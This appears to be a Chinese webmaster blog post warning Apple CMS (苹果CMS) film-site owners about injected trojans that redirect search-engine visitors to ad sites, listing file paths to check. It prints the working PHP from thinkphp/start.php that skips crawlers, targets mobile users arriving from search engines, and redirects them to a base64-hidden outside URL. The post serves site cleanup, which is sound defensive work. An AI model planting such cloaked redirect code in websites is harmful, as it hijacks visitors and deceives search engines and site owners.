苹果CMS网站被挂马,搜索引擎进来跳转广告?随机触发跳转怎么办

影视行业用苹果CMS做站的人比较多,不少人在不愿意接广告情况下被强制挂马。

这种木马最常见在什么目录呢?建议每个站长都排查一下下面路径文件,没流量就不用查了

搜索引擎跳转广告就查
thinkphp/start.php
下面是木马重定向代码,根据条件随机触发跳转

$agentt = strtolower($_SERVER['HTTP_USER_AGENT']);
if(stripos($agentt,'spider') == false && stripos($agentt,'bot')== false) {
if(strpos($agentt, 'ios') || stripos($agentt, 'android') || stripos($agentt, 'iphone') || stripos($agentt, 'ipad'))        {
$laiyuan=@strtolower($_SERVER['HTTP_REFERER']);
if (strpos($laiyuan, 'baidu') || stripos($laiyuan, '360')|| stripos($laiyuan, 'google')|| stripos($laiyuan, 'cn')|| stripos($laiyuan, 'com') ||stripos($laiyuan, 'sogou') || stripos($laiyuan, 'so'))  {
$new_url=base64_decode('aHR0cHM6Ly9oZXhpZXlzLmNvbS9nLnBocA==');
header("Location:$new_url");
exit;
}   
}
}

其他常见挂马文件路径

application/extra/

static/js/player.js

static/js/jquery.js

d2b5ca33bd20240325013617

 

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称表情代码图片快捷回复

    暂无评论内容

社区求救信号帮助是一种美德